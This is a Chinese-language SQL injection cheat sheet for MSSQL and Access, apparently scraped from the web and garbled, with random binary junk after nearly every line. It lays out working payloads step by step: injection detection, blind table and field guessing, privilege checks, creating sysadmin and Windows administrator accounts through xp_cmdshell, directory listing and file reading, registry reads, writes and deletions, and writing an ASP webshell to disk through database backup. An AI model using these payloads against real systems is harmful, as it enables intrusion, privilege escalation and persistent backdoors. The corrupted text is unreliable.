1.判断是否有注入;and 1=1 ;and 1=2 1B�(G]o_>!
2.初步判断是否是mssql ;and user>0 �8a?IC|~Pz
�i"<��ZVw
3.注入参数是字符'and [查询条件] and ''=' �Pm~,Ky&Hl
�9V.+�U7\w
4.搜索时没过滤参数的'and [查询条件] and '%25'=' /�K[]B]1NE
�d;<.;Od$`
5.判断数据库系统 $.�;iu2iyo
K('
9l&� A
;and (select count(*) from sysobjects)>0 mssql �vWuy�ft�*
'��Z y{mq\
;and (select count(*) from msysobjects)>0 access ~RA�zFLt6x
��fs�7~NY�
pRb<wt7v��
}&C dsCM>2
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ?�S8$5�gA
A_a�O�}oBX
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 f�G3w�c
l~
PMQb\%iE�"
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 y�>�4�p~��
7WX���iG0�
9.(1)猜字段的ascii值(access) (&k')�ff9K
NWeV>;lh�9
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �5%�'o%`?i
N�z}|%.GP"
(2)猜字段的ascii值(mssql) w{~"�� ;[@
1��R*1BStc
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �$f9 �,##/
<Nvl�k�\LQ
10.测试权限结构(mssql) �nM=2"`@�$
% /~os��2R
*u58l(&`8�
)eVzS�j>MT
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �ybC-f'��0
,#=eu85�'
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �S���Cq�u,
��Rz)v�-Yu
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��cl�?�<
7
=7#u+*Yr9
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- W31LNysH!;
B��EFe~* ~
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- � PE^eP}O1
uQO(?n��Ci
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- /@6E3�lh�S
$#�D
n�4��
;and 1=(select IS_MEMBER('db_owner'));-- ��1<;\�6sg
�e��og\pMv
�CZF��^Wxk
7?���+5%7-
11.添加mssql和系统的帐户 jQ�O*�oq}
0kkRK*fp}x
;exec master.dbo.sp_addlogin username;-- '9f6ZAnYpQ
;exec master.dbo.sp_password null,username,password;-- 7�sCR��!�0
=`r��p�p�O
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- F��@��B���
+Kxe ymwr2
;exec master.dbo.xp_cmdshell 'net user username password �6\%r6�_.d
B�>ms`|q=l
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �-/@|2�!�d
MX�"A@p~H�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- %g!yccD9��
^-
u[q-
!
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 5`(((_Um+�
U�f=�vs(��
-bv�>�iIC
���Z83�q-�
12.(1)遍历目录 �L�ZgwIMd�
y�>�Df�M5>
;create table dirs(paths varchar(100), id int) l���~�`txe
A��9NOe�E�
;insert dirs exec master.dbo.xp_dirtree 'c:\' +�8MW$ �m$
�+8L(�pMI4
;and (select top 1 paths from dirs)>0 NE�jP�U#@c
iK$Vd+Lgc
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) f6keWqv<GW
�
J�sZA�P�
%@�M00�~-
�7�f.4/x^�
(2)遍历目录 �!%SdTaC{T
)6O��\WB|�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 53g8T+`\(�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��>x��h�d[
)�pkhir06t
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 oG|?��F4l*
�_�lP4ez
Y
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 9^6|�ta0;0
�<�B|n<R<?
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Z!q2F%02FO
o[5=S�,�'
;�t.�SiA��
�L7~+x�^kw
13.mssql中的存储过程 !=8L.�^�5c
S3%.-)ib��
xp_regenumvalues 注册表根键, 子键 ">�0/>>Ry�
I!C(���K�^
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 WLg6-@kxXs
-o=P8�5��V
xp_regread 根键,子键,键值名 ~9`�^7��2
�r6gt9u:��
;exec xp_regread @m !9"�QhC
TFiuz;��*|
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �7I2a*�4}
SX1Fyy�6
w
xp_regwrite 根键,子键, 值名, 值类型, 值 |���TQedC
�7Va#{Y;Zy
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 g]�EQ2g_N1
Zzt�t�)/6*
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ~:P8g<w�
Thht_3_C,f
xp_regdeletevalue 根键,子键,值名 v*C+U$_3\1
�/-G qG)PX
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !`O_VV`/@
7�?�n*���t
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 a<a&6��3�
E.7A�bHph0
r{Q�s���9
M�ip��m&5R
14.mssql的backup创建webshell U�5@TaGbx�
S*�2L4Uj`|
use model 9�T�bS�>o�
:�F�KYYH\�
create table cmd(str image); thlp�j�*|
te��QaHe#
insert into cmd(str) values (''); .g(��\�B��
Pq[0vZ_}dN
backup database model to disk='c:\l.asp'; �N�IWI6qCw
]ut�-wqb{p
i�5����>J
E7G�i�6w~\
15.mssql内置函数 %>I?�'��y^
�M�2zos(8g
;and (select @@version)>0 获得Windows的版本号 �_Vk,&�'��
Hw�V�gT�"�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ^w&5@3��d�
O3�<Y��_I^
;and (select user_name())>0 爆当前系统的连接用户 e��aYkYuS/
^J#*n;OQ3A
;and (select db_name())>0 得到当前连接的数据库 #�(26�t _a
?hry�=I(7r
k^'d@1z;C�
��tLoD"/z�
16.简洁的webshell �:#�E�x3H7
*$4A|�EA V
use model k_En_\c?p2
>�H�=Q$g�I
create table cmd(str image); %1 VNP�(E�
>zf�Zw"mEP
insert into cmd(str) values (''); d�<|lL��NS
cc��2��oFn
backup database model to disk='g:\wwwtest\l.asp';
